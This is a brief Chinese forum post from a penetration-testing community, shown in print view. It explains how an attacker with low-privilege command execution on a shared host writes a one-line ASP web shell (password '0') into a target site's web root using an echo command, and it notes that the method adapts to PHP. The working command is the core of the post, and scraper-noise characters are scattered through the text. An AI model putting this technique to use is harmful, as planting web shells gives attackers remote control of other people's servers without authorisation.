中国网络渗透测试联盟

标题: 旁注cmd低权限下拿webshell [打印本页]

作者: admin    时间: 2012-9-23 14:40
标题: 旁注cmd低权限下拿webshell
在旁注过程中,可以执行cmd而权限又比较低的情况下,有时候可以用这个方法帮你拿下目标站。
/ p$ e4 ~/ d& c* G+ M  _
0 v' S; n( j' T命令格式! b+ k' V* P7 C$ |; E, _5 ~4 r

4 o$ @# ]& x7 D( ]; ?! lEcho 语句 >目标站绝对目录2 E4 w% U8 _& `' p5 \
/ S" k/ N: |4 e. {  L
例如:
# U7 j4 G& B; k. p4 l( ^& n4 \
  n, U9 ^2 _( F% V( Jecho ^<^%execute request("0")%^> >D:\03389.com\wwwroot\YingMu.asp
  ^9 x$ {# w0 x  u  f1 T) z: }; B. M
这样访问目标站的目录下就会生成一个密码为0的asp的一句话,此方法在PHP等脚本语言均适用,大家灵活发挥。% Q) D9 }1 q/ }" F- t





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2